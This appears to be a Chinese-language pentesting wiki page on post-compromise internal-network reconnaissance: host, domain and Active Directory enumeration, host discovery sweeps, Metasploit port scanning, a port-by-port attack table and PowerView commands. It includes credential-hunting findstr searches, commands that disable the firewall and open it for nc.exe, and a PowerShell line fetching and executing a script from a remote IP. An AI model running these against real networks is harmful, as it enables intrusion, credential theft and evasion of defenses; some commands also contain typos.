内网信息收集

内网信息收集的作用

可以通过信息收集判断当前设备的角色、当前网络的环境、当前所属的区域，绘制出大概的内网整体的拓扑结构图

区域：

普通办公区设备
DMZ区域的WEB服务器
内网普通WEB服务器
开发测试服务器
文件共享服务器
代理服务器
DNS服务器
核心业务系统服务器

设备信息：

设备提供服务
设备所处位置
设备主机名
设备内部文件
设备网络连接

设备关键信息

操作系统
系统版本
系统服务
系统端口
系统进程
系统补丁
内网IP地址段
系统权限
系统共享
网络连接
杀毒软件
用户角色

敏感信息收集

资料、文件和数据

数据和文件定位
定位内部人事组织架构
监视等重要人员
监视人员设备
人员存放文档的位置
列举文档服务器目录

核心业务机器

高级管理、人事、财务等个人电脑
产品管理系统服务器
办公系统服务器
财务应用系统服务器
核心产品源码服务器
数据库服务器
文件/共享服务器
电子邮件服务器
网络监控服务器
供应链服务器

敏感信息和文件

网站源码备份文件、数据库备份文件
各类数据库的WEB管理/后台入口
浏览器密码和浏览器Cookie
远程桌面连接
回收站
个人及服务器相关密码
无线密码
各类系统账号和密码等
浏览器浏览记录

应用与文件形式信息收集

拿下一台机器后要先维权，权限稳了再收集信息，信息收集一定要全面仔细，信息收集完了再搞内网
往目标主机中传工具用完就删
翻文件的话，可以使用一些搜索命令来快速寻找

# 指定目录下的文件中搜集各种账号密码：
findstr /si pass *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si userpwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si pwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si login *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si user *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak

前后端基本架构

渗透测试人员需要对目标网站的基本情况进行简单的判断，分析目标服务器所使用的web服务器、后端脚本、数据库、系统平台等

# 常见的web架构
ASP + Access + IIS 5.0/6.0 + Windows Server 2003
ASPX + MSSQL + IIS 7.0/7.5 + Windows Server 2008
PHP + MySQL + Apache
PHP + MySQL + IIS
PHP + MySQL + Nginx
JSP + MySQL + Nginx
JSP + MSSQL + Tomcat
JSP + Oracle + Tomcat

本机信息收集

Windows

Linux

网络

ipconfig /all

ifconfig

操作系统

- systeminfo | findstr OS - systeminfo | findstr "KB" - systeminf0 | findstr /B /C:"OS 名称" /C:"OS 版本" - echo %PROCESSOR_ARCHITECTURE%

- uname –a - cat /proc/version

软件及版本

- wmic product get name,version - powershell "get-wmiobject -class win32_product | select-object -property name,version"

- dpkg –l - dpkg –l <软件名称>

服务

- wmic service list brief - net start - 检测是否安装杀软：https://www.ddosi.org/av/1.php

- service --status-all - service <服务名> status

进程

- tasklist - wmic process get name,processid

- ps –aux - ps –ef - ps –aux | gerp ftp

启动程序

wmic startup get command,caption

dmesg

计划任务

- at - schtasks - net start - chcp 437 && schtasks /query /fo LIST /v > tasks.txt

crontab -l

开机时间

net statistics workstation

- cat /proc/uptime - date -d "$(awk -F. '{print $1}' /proc/uptime) second ago" +"%Y-%m-%d %H:%M:%S" - cat /proc/uptime | awk -F. '{run_days=$1/86400)/3600;run_minute=($1 % 3600)/60;run_second=$1 % 60;printf("系统已运行：%d天%d时%d分%d秒",run_days,run_hour,run_minute,run_second)}'

用户

- 本机用户列表：net user - 本地管理员组信息：net localgroup administrators - 当前在线用户：query user

- cat /etc/passwd - cat /etc/group

会话

net session

端口

netstat –ano

netstat –antpl

补丁

- systeminfo - wmic qfe get Caption,Description,HotFixID,InstalledOn

共享

- net share - wmic share get name,path,status

路由及ARP

- route print - arp -a

- route - arp –a

防火墙

- 查看防火墙配置：netsh firewall show config - 关闭防火墙配置：netsh firewall set opmode disable - 关闭防火墙配置：netsh advfirewall set allprofiles state off - 允许指定程序全部链接：netsh firewall add allowedprogram c:\nc.exe "allow nc" enable - 允许指定程序入站：netsh advfirewall firewall add rule name= "pass nc" dir=in action=allow program="C:\nc.exe" - 允许指定程序出站：netsh advfirewall firewall add rule name= "out nc" dir=out action=allow program="C:\nc.exe" - 允许RDP(3389)端口放行：netsh advfirewall firewall add rule name= "Remote Desktop" protocol=TCP dir=in localport=3389 action=allow - 自定义防火墙日志的储存位置：netsh advfirewall set currentprofile logging filename "C:\windows\temp\fw.log"

代理

- 代理配置：reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"

远程

- 查看远程连接端口（16进制需要转成10进制）：reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber - 查看远程桌面开启状态：REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD - 打开远程桌面：REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f - 关闭远程桌面：wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 0 - 关闭远程桌面：REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 1 /f

权限及SID

whoami /all

whoami

自动收集信息

为了简化操作，可以创建一个脚本，在目标机器上完成流程、服务、用户账号、用户组、网时区等信息的查询工作。

利用 WMIC 进行信息收集：创建 wmic.bat 文件 写入如下内容，运行后生成 .html 文件

for /f "delims=" %%A in ('dir /s /b %WINDIR%\system32\*htable.xsl') do set "var=%%A"

wmic process get CSName,Description,ExecutablePath,ProcessId /format:"%var%" >> sysinfo.html
wmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName /format:"%var%" >> sysinfo.html
wmic USERACCOUNT list full /format:"%var%" >> sysinfo.html
wmic group list full /format:"%var%" >> sysinfo.html
wmic nicconfig where IPEnabled='true' get Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,MACAddress /format:"%var%" >> sysinfo.html
wmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace /format:"%var%" >> sysinfo.html
wmic netuse list full /format:"%var%" >> sysinfo.html
wmic qfe get Caption,Description,HotFixID,InstalledOn /format:"%var%" >> sysinfo.html
wmic startup get Caption,Command,Location,User /format:"%var%" >> sysinfo.html
wmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version /format:"%var%" >> sysinfo.html
wmic os get name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUser,ServicePackMajorVersion,SystemDirectory /format:"%var%" >> sysinfo.html
wmic Timezone get DaylightName,Description,StandardName /format:"%var%" >> sysinfo.html

域内信息收集

描述

命令

查询域名

ipconfig /all

查询DNS的记录

nslookup <域名>

存在用户

dsquery user

域内用户详细信息

wmic useraccount get /all

判断主域控

netdom query pdc

用时间服务器判断主域

net time /domain

当前登录域及用户信息

net config workstation

查询域

net view /domain

域内所有计算机

net view /domain:<域名>

所有域用户列表

net user /domain

本地管理员组用户

net localgroup administrators

查询域内所有用户

net group /domain

域管理员列表

net group "domain admins" /domain

企业管理员列表

net group "Enterprise admins" /domain

域成员计算机列表

net group "domain computers" /domain

域控列表

net group "domain controllers" /domain

域密码策略信息

net accounts /domain

域信任信息

nltest /domain_trusts

域控主机名

nltest /DCLIST:<域名>

域管理进程

tasklist -v

域内活跃主机探测

NetBIOS扫描

NetBIOS(Network Basic Input/Output System)即网络基本输入/输出系统协议
NetBIOS 协议是一种在局域网上的程序可以使用的应用程序编程接口(API)，为程序提供了请求低级服务的统一的命令集，作用是为了给局域网提供网络以及其他特殊功能，几乎所有的局域网都是在 NetBIOS 协议的基础上工作的
nbtscan.exe 是一个命令行工具，可以扫描本地或者远程网路上开放的 NetBIOS 名称服务，可以获取对应的域名信息
某些版本的 windows 操作系统允许用户通过 NetBOIS 查询已登录用户，可用通过脚本扫描远程系统活跃域中的管理会话

nbtscan.exe -h
nbtscan.exe -m <xxx.xxx.xxx.0>/24

# 扫描远程系统的 NetBOIS 信息
for /F %i in (ips.txt) do @echo [+]Checking %i && nbtstat -A %i 2>NUL >nbsessions.txt && for /F %n in (names.txt) do @type nbsessions.txt | findstr /I %n > NUL && echo [!] %n was found logged into %i

ICMP扫描

ICMP 协议全称为 Internet Control Message Protocol (Internet控制报文协议)，依次对内网中的每个 IP 地址执行 ping 命令，可以快速找到内网中全部存活的主机

for /L %I in (1,1,254) Do @ping -w 1 -n 1 <xxx.xxx.xxx>.%I | findstr "TTL="

ARP扫描

地址解析协议，即 ARP（Address Resolution Protocol），是根据 IP 地址获取物理地址的一个 CP/IP 协议。主机发送信息时将包含目标 IP 地址的 ARP 请求广播到局域网络上的所有主机，并接收返回消息，以此确定目标的物理地址

arp-scan.exe -t <xxx.xxx.xxx.0>/24

Nishang脚本

项目地址：https://github.com/samratashok/nishang

powershell -exec bypass -Command "& {Import-Module C:\Users\Administrator\Desktop\Invoke-ARPScan.ps1; Invoke-ARPScan -CIDR 192.168.253.0/24}"

域内端口扫描

Metasploit

# 进入 msf 命令行
msfconsole

# 搜索端口扫描模块
search portscan

# 使用TCP扫描模块
use auxiliary/scanner/portscan/tcp

# 查看需要设置的参数
show options

# 设置扫描目标的IP
set rhosts <目标IP>

# 设置要扫描的端口
set ports <端口1>,<端口2>,<端口3>,...

# 开始扫描
run

banner信息

常需扫描的端口有：22,80-89,110,389,1099,1433,2059,6379,7001,8080,1521,3306,3389,5432,53,161,137,139

端口

服务

入侵方式

ftp/tftp/vsftpd文件传输协议

爆破/嗅探/溢出/后门

ssh远程连接

爆破/openssh漏洞

Telnet远程连接

爆破/嗅探/弱口令

SMTP邮件服务

邮件伪造

DNS域名解析系统

域传送/劫持/缓存投毒/欺骗

67/68

DHCP服务

劫持/欺骗

110

pop3

爆破/嗅探

139

Samba服务

爆破/未授权访问/远程命令执行

143

Imap协议

爆破

161

SNMP协议

爆破/搜集目标内网信息

389

Ldap目录访问协议

注入/未授权访问/弱口令

445

smb

ms17-010/端口移出

512/513/514

Linux Rexec服务

爆破/Rlogin登录

873

Rsync服务

文件上传/未授权访问

1080

socket

爆破

1352

Lotus domino邮件服务

爆破/信息泄露

1433

mssql

爆破/注入/SA弱口令

1521

oracle

爆破/注入/TNS爆破/反弹shell

2049

Nfs服务

配置不当

2181

zookeeper服务

未授权访问

2375

docker remote api

未授权访问

3306

mysql

爆破/注入

3389

Rdp远程桌面链接

爆破/shift后门

4848

GlassFish控制台

爆破/认证绕过

5000

sybase/DB2数据库

爆破/注入/提权

5432

postgresql

爆破/注入/缓冲区溢出

5632

pcanywhere服务

抓密码/代码执行

5900

vnc

爆破/认证绕过

6379

Redis数据库

未授权访问/爆破

7001/7002

weblogic

java反序列化/控制台弱口令

80/443

http/https

web应用漏洞/心脏滴血

8069

zabbix服务

远程命令执行/注入

8161

activemq

弱口令/写文件

8080/8089

Jboss/Tomcat/Resin

爆破/PUT文件上传/反序列化

8083/8086

influxDB

未授权访问

9000

fastcgi

远程命令执行

9090

Websphere控制台

爆破/java反序列化/弱口令

9200/9300

elasticsearch

远程代码执行

11211

memcached

未授权访问

27017/27018

mongodb

未授权访问/爆破

定位域管理员

psloggedon

在 Windows 上可以执行 net session 来查看谁使用了本机资源，但是没有命令可用来查看谁在使用了远程计算机资源，谁登陆了远程计算机资源，使用 psloggedon 可以解决这一问题。
地址：https://docs.microsoft.com/en-us/sysinternals/downloads/psloggedon
用法：psloggedon [- ] [-l] [-x] [\\computername | username]

PVEFindADUser

用于查找活动目录用户登录位置，枚举域用户，查找在特定计算机上登录的用户，包括本地用户，通过RDP登录的用户，用于运行服务和计划任务的用户。运行该工具需要 .NET Framework2.0 环境，并且具备管理员权限。
用法：PVEFindADUser.exe -current

netview

使用 WinAPI 枚举系统，利用 NetSessionEnum 找寻登录会话，利用 NetShareEnum 找寻共享，利用 NetWkstaUserEnum 枚举登录的用户。大部分功能不需要管理员权限。
地址：https://github.com/mubix/netview

PowerView（常用）

powerView.ps1 是一款依赖 powershell 和 wmi 对内网进行查询的常用渗透测试脚本，集成在 powersploit 工具包中，是一个收集域信息很好用的脚本。
地址：https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView

PowerShell收集信息

PowerShell是微软推出的一款满足管理员对操作系统及应用程序扩展需求的一个脚本环境，是cmd.exe的加强版

4种执行权限

Restricted - 默认的设置，不允许任何script运行
AllSigned - 只能运行经过数字证书签名的script
RemoteSigned - 本地脚本不做限制，网络上下载的script就必须要有数字签名
Unrestricted - 允许所有的script运行，权限最高

脚本地址：https://github.com/PowerShellEmpire/PowerTools

# 查看当前权限
Get-ExecutionPolicy

# 修改权限
Set-ExecutionPolicy <Unrestricted> 

# 导入脚本
Import-Module <powerview.ps1>

# 绕过权限
powershell -exec bypass "import-module ./<powerview.ps1>;<命令>"
powershell -exec bypass -nop -c "iex(New-Object Net.WebClient).DownloadString('http://<远程IP>/<powerview.ps1>');<命令>"

PowerView

PowerView 是一款依赖 Powershell 和 WMI 对内网进行查询的渗透测试脚本

常用命令

命令

描述

Get-NetDomain

获取当前用户所在域的名称

Get-NetUser

获取所有用户的详细信息

Get-NetDomainController

获取所有域控制器的信息

Get-NetComputer

获取域内所有机器的详细信息

Get-NetPrinter

获取域中所有当前计算机对象的数组

Get-NetOU

获取域内的OU信息

Get-NetGroup

获取所有域内组和组成员的信息

Get-NetGroupMember

获取指定域组中所有当前用户的列表

Get-NetFileServer

根据SPN获取当前域使用的文件服务器信息

Get-NetShare

获取当前域内所有的网络共享信息

Get-DFSshare

获取域上所有分发文件系统共享的列表

Get-NetSubnet

获取域的其他网段

Get-NetSite

获取域内的当前站点

Get-NetDomainTrust

获取当前用户域的所有信任

Get-NetForestTrust

获取与当前用户的域关联的林的所有信任

Find-ForeignUser

枚举在其主域之外的组中的用户

Find-ForeignGroup

枚举域组的所有成员并查找查询域之外的用户

Invoke-MapDomainTrust

尝试构建所有域信任的关系映射

Get-NetLoggedon

获取主动登录到指定服务器的用户

Get-NetLocalGroup

获取一个或多个远程主机上本地组的成员

Get-NetSession

获取指定服务器的会话

Get-NetRDPSession

获取指定服务器的远程连接

Get-NetProcess

获取远程主机的进程

Get-UserEvent

获取指定用户的日志

Get-ADObject

获取活动目录的对象

Get-NetGPO

获取域内所有的组策略对象

Get-NetGPOGroup

获取域中设置”受限组”的所有GPO

Find-GPOLocation

获取用户/组，并通过GPO枚举和关联使其具有有效权限的计算机

Find-GPOComputerAdmin

获取计算机并通过GPO枚举确定谁对其具有管理权限

Get-DomainPolicy

获取域默认策略或域控制器策略

Get-DomainSID

返回指定域的SID

Invoke-UserHunter

获取域用户登录的计算机信息及该用户是否有本地管理员权限

Invoke-ProcessHunter

通过查询域内所有的机器进程找到特定用户

Invoke-UserEventHunter

根据用户日志查询某域用户登陆过哪些域机器

Invoke-ShareFinder

在本地域中的主机上查找（非标准）共享

Invoke-FileFinder

在本地域中的主机上查找潜在的敏感文件

Find-LocalAdminAccess

在域上查找当前用户具有本地管理员访问权限的计算机

Find-ManagedSecurityGroups

搜索受管理的活动目录安全组并标识对其具有写访问权限的用户，即这些组拥有添加或删除成员的能力

Get-ExploitableSystem

发现系统可能易受常见攻击

Invoke-EnumerateLocalAdmin

枚举域中所有计算机上本地管理员组的成员

Previous内网基础 Next通信隧道

Last updated 3 years ago